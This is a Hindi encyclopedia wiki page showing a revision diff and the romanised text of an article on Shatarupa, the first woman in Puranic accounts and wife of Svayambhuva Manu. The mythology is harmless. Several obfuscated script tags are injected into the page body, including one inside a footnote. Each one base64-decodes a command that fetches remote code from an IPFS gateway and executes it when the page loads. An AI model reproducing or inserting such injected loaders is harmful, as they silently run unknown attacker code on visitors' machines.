Difference between revisions of "शतरूपा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replacement - "khoj.bharatdiscovery.org" to "bharatkhoj.org")
 
(2 intermediate revisions by 2 users not shown)
Line 1: Line 1:
'''शतरूपा''' संसार की प्रथम स्त्री थी तथा शतरूपा स्वायंभुव मनु की स्त्री थी, इनका जन्म [[ब्रह्मा]] के वामांग से हुआ था।<ref>[[ब्रह्मांडपुराण]] 2-1-57</ref> इन्हें प्रियव्रात, [[उत्तानपाद]] आदि सात पुत्र और तीन कन्याएँ उत्पन्न हुईं।  सुखसागर के अनुसार सृष्टि की वृद्धि के लिये ब्रह्मा जी ने अपने शरीर को दो भागों में बाँट लिया। जिनके नाम 'का' और 'या' (काया) हुये। उन्हीं दो भागों में से एक भाग से पुरुष तथा दूसरे भाग से स्त्री की उत्पत्ति हुई। पुरुष का नाम [[स्वयंभुव मनु]] और स्त्री का नाम शतरूपा था। इन्हीं प्रथम पुरुष और प्रथम स्त्री की सन्तानों से संसार के समस्त जनों की उत्पत्ति हुई। स्वयंभुव मनु की सन्तान होने के कारण वे मानव कहलाये।
+
'''शतरूपा''' विश्व की प्रथम स्त्री तथा [[स्वयंभुव मनु]] की पत्नी थी। इनका जन्म [[ब्रह्मा]] के वामांग से हुआ था।<ref>[[ब्रह्मांडपुराण]] 2-1-57</ref> इन्हें प्रियव्रात, [[उत्तानपाद]] आदि सात पुत्र और तीन कन्याएँ हुई थीं।
  
*नरमानस पुत्रों के बाद ब्रह्मा ने [[अंगजा]] नाम की एक कन्या उत्पन्न की, जिसके शतरूपा, [[सरस्वती]] आदि नाम भी थे।
+
*'सुखसागर' के अनुसार सृष्टि की वृद्धि के लिये [[ब्रह्मा]] ने अपने शरीर को दो भागों में बाँट लिया, जिनके नाम 'का' और 'या' (काया) हुए। उन्हीं दो भागों में से एक भाग से पुरुष तथा दूसरे भाग से स्त्री की उत्पत्ति हुई। पुरुष का नाम [[स्वयंभुव मनु]] और स्त्री का नाम शतरूपा था। इन्हीं प्रथम पुरुष और प्रथम स्त्री की सन्तानों से संसार के समस्त जनों की उत्पत्ति हुई। स्वयंभुव मनु की सन्तान होने के कारण वे मानव कहलाये।<ref name="aa">{{cite web |url= http://bharatkhoj.org/india/%E0%A4%B6%E0%A4%A4%E0%A4%B0%E0%A5%82%E0%A4%AA%E0%A4%BE|title= शतरूपा|accessmonthday= 19 जुलाई|accessyear= 2015|last= |first= |authorlink= |format= |publisher= भारतखोज|language= हिन्दी}}</ref>
*मत्स्य पुराण में लिखा है कि ब्रह्मा से स्वायंभुव मनु, मारीच आदि सात पुत्र हुए<ref>मत्स्यपुराण 4-24-30</ref> हरिहर पुराणानुसार शतरूपा ने घोर तपस्या करके स्वायंभुव मनु को पति रूप में प्राप्त किया था और इनसे वीर नामक एक पुत्र हुआ।
+
*नरमानस पुत्रों के बाद [[ब्रह्मा]] ने [[अंगजा]] नाम की एक कन्या उत्पन्न की, जिसके शतरूपा, सरस्वती आदि नाम भी थे।
*[[मार्कण्डेय पुराण]] में शतरूपा के दो पुत्रों के अतिरिक्त ऋद्धि तथा प्रसूति नाम की दो कन्याओं का भी उल्लेख है। कहीं-कहीं एक और तीसरी कन्या देवहूति का भी नाम मिलता है।
+
*[[मत्स्य पुराण]] में लिखा है कि ब्रह्मा से स्वयंभुव मनु, मारीच आदि सात पुत्र हुए।<ref>मत्स्यपुराण 4-24-30</ref> हरिहर पुराणानुसार शतरूपा ने घोर तपस्या करके स्वयंभुव मनु को पति रूप में प्राप्त किया था। इनसे वीर नामक एक पुत्र हुआ।
 +
*[[मार्कण्डेय पुराण]] में शतरूपा के दो पुत्रों के अतिरिक्त ऋद्धि तथा प्रसूति नाम की दो कन्याओं का भी उल्लेख है। कहीं-कहीं एक और तीसरी कन्या देवहूति का भी नाम मिलता है।
 
*[[शिव पुराण|शिव]] तथा [[वायु पुराण|वायु पुराणों]] में दो कन्याओं प्रसूति एवं आकूति का नाम है।
 
*[[शिव पुराण|शिव]] तथा [[वायु पुराण|वायु पुराणों]] में दो कन्याओं प्रसूति एवं आकूति का नाम है।
*वायु पुराण के अनुसार ब्रह्म शरीर के दो अंश हुए थे, जिनमें से एक से शतरूपा हुई थीं।
+
*वायु पुराण के अनुसार ब्रह्मा के शरीर के दो अंश हुए थे, जिनमें से एक से शतरूपा हुई थी।
 
*देवी भागवत आदि में शतरूपा की कथाएँ कुछ भिन्न दी हुई हैं।<ref>स्वर्गीय रामाज्ञा द्विवेदी</ref>
 
*देवी भागवत आदि में शतरूपा की कथाएँ कुछ भिन्न दी हुई हैं।<ref>स्वर्गीय रामाज्ञा द्विवेदी</ref>
 
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
Line 14: Line 14:
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{पौराणिक चरित्र}}
 
{{पौराणिक चरित्र}}
[[Category:पौराणिक चरित्र]][[Category:पौराणिक कोश]][[Category:हिन्दी विश्वकोश]]
+
[[Category:पौराणिक चरित्र]][[Category:पौराणिक कोश]][[Category:प्रसिद्ध चरित्र और मिथक कोश]][[Category:हिन्दी विश्वकोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 12:26, 25 October 2017

shataroopa vishv ki pratham stri tatha svayanbhuv manu ki patni thi. inaka janm brahma ke vamaang se hua tha.[1] inhean priyavrat, uttanapad adi sat putr aur tin kanyaean huee thian.

  • 'sukhasagar' ke anusar srishti ki vriddhi ke liye brahma ne apane sharir ko do bhagoan mean baant liya, jinake nam 'ka' aur 'ya' (kaya) hue. unhian do bhagoan mean se ek bhag se purush tatha doosare bhag se stri ki utpatti huee. purush ka nam svayanbhuv manu aur stri ka nam shataroopa tha. inhian pratham purush aur pratham stri ki santanoan se sansar ke samast janoan ki utpatti huee. svayanbhuv manu ki santan hone ke karan ve manav kahalaye.[2]
  • naramanas putroan ke bad brahma ne aangaja nam ki ek kanya utpann ki, jisake shataroopa, sarasvati adi nam bhi the.
  • matsy puran mean likha hai ki brahma se svayanbhuv manu, marich adi sat putr hue.[3] harihar purananusar shataroopa ne ghor tapasya karake svayanbhuv manu ko pati roop mean prapt kiya tha. inase vir namak ek putr hua.
  • markandey puran mean shataroopa ke do putroan ke atirikt rriddhi tatha prasooti nam ki do kanyaoan ka bhi ullekh hai. kahian-kahian ek aur tisari kanya devahooti ka bhi nam milata hai.
  • shiv tatha vayu puranoan mean do kanyaoan prasooti evan akooti ka nam hai.
  • vayu puran ke anusar brahma ke sharir ke do aansh hue the, jinamean se ek se shataroopa huee thi.
  • devi bhagavat adi mean shataroopa ki kathaean kuchh bhinn di huee haian.[4]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. brahmaandapuran 2-1-57
  2. shataroopa (hindi) bharatakhoj. abhigaman tithi: 19 julaee, 2015.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
  3. matsyapuran 4-24-30
  4. svargiy ramajna dvivedi

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>